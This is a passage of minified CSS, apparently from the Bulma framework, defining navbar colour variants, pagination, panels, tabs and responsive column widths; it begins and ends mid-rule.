.navbar-link:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-start .navbar-link:after,.navbar.is-info .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3e8ed0;color:#fff}}.navbar.is-success{background-color:#48c78e;color:#fff}.navbar.is-success .navbar-brand>.navbar-item,.navbar.is-success .navbar-brand .navbar-link{color:#fff}.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-success .navbar-start>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-end .navbar-link{color:#fff}.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-start .navbar-link:after,.navbar.is-success .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c78e;color:#fff}}.navbar.is-warning{background-color:#ffe08a;color:#000000b3}.navbar.is-warning .navbar-brand>.navbar-item,.navbar.is-warning .navbar-brand .navbar-link{color:#000000b3}.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-warning .navbar-start>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-end .navbar-link{color:#000000b3}.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-start .navbar-link:after,.navbar.is-warning .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffe08a;color:#000000b3}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand>.navbar-item,.navbar.is-danger .navbar-brand .navbar-link{color:#fff}.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-danger .navbar-start>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-end .navbar-link{color:#fff}.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-start .navbar-link:after,.navbar.is-danger .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px #f5f5f5}.navbar.is-fixed-top{top:0}html.has-navbar-fixed-top,body.has-navbar-fixed-top{padding-top:3.25rem}html.has-navbar-fixed-bottom,body.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:#0000000d}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}a.navbar-item,.navbar-link{cursor:pointer}a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover,a.navbar-item.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,.navbar-link.is-active{background-color:#fafafa;color:#485fc7}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#485fc7}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#485fc7;border-bottom-style:solid;border-bottom-width:3px;color:#485fc7;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless):after{border-color:#485fc7;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width: 1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link:after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px #0a0a0a1a;padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}html.has-navbar-fixed-top-touch,body.has-navbar-fixed-top-touch{padding-top:3.25rem}html.has-navbar-fixed-bottom-touch,body.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width: 1024px){.navbar,.navbar-menu,.navbar-start,.navbar-end{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-start,.navbar.is-spaced .navbar-end{align-items:center}.navbar.is-spaced a.navbar-item,.navbar.is-spaced .navbar-link{border-radius:4px}.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent .navbar-link.is-active{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link:after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px #0a0a0a1a;top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px #0a0a0a1a;display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar.is-spaced .navbar-dropdown,.navbar-dropdown.is-boxed{border-radius:6px;border-top:none;box-shadow:0 8px 8px #0a0a0a1a,0 0 0 1px #0a0a0a1a;display:block;opacity:0;pointer-events:none;top:calc(100% - 4px);transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.navbar>.container .navbar-brand,.container>.navbar .navbar-brand{margin-left:-.75rem}.navbar>.container .navbar-menu,.container>.navbar .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-desktop{top:0}html.has-navbar-fixed-top-desktop,body.has-navbar-fixed-top-desktop{padding-top:3.25rem}html.has-navbar-fixed-bottom-desktop,body.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}html.has-spaced-navbar-fixed-top,body.has-spaced-navbar-fixed-top{padding-top:5.25rem}html.has-spaced-navbar-fixed-bottom,body.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}a.navbar-item.is-active,.navbar-link.is-active{color:#0a0a0a}a.navbar-item.is-active:not(:focus):not(:hover),.navbar-link.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link,.navbar-item.has-dropdown.is-active .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-previous,.pagination.is-rounded .pagination-next{padding-left:1em;padding-right:1em;border-radius:9999px}.pagination.is-rounded .pagination-link{border-radius:9999px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-previous,.pagination-next,.pagination-link{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-previous:hover,.pagination-next:hover,.pagination-link:hover{border-color:#b5b5b5;color:#363636}.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus{border-color:#485fc7}.pagination-previous:active,.pagination-next:active,.pagination-link:active{box-shadow:inset 0 1px 2px #0a0a0a33}.pagination-previous[disabled],.pagination-previous.is-disabled,.pagination-next[disabled],.pagination-next.is-disabled,.pagination-link[disabled],.pagination-link.is-disabled{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-previous,.pagination-next{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#485fc7;border-color:#485fc7;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}.pagination-list li{list-style:none}@media screen and (max-width: 768px){.pagination{flex-wrap:wrap}.pagination-previous,.pagination-next,.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width: 769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{margin-bottom:0;margin-top:0}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between;margin-bottom:0;margin-top:0}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:#000000b3}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#485fc7;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#485fc7}.panel.is-link .panel-block.is-active .panel-icon{color:#485fc7}.panel.is-info .panel-heading{background-color:#3e8ed0;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3e8ed0}.panel.is-info .panel-block.is-active .panel-icon{color:#3e8ed0}.panel.is-success .panel-heading{background-color:#48c78e;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c78e}.panel.is-success .panel-block.is-active .panel-icon{color:#48c78e}.panel.is-warning .panel-heading{background-color:#ffe08a;color:#000000b3}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffe08a}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffe08a}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-tabs:not(:last-child),.panel-block:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#485fc7}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#485fc7;color:#363636}.panel-block.is-active .panel-icon{color:#485fc7}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#485fc7;color:#485fc7}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-top-left-radius:4px;border-bottom-left-radius:4px}.tabs.is-toggle li:last-child a{border-top-right-radius:4px;border-bottom-right-radius:4px}.tabs.is-toggle li.is-active a{background-color:#485fc7;border-color:#485fc7;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:9999px;border-top-left-radius:9999px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:9999px;border-top-right-radius:9999px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none;width:unset}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0%}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width: 768px){.column.is-narrow-mobile{flex:none;width:unset}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0%}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width: 769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none;width:unset}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin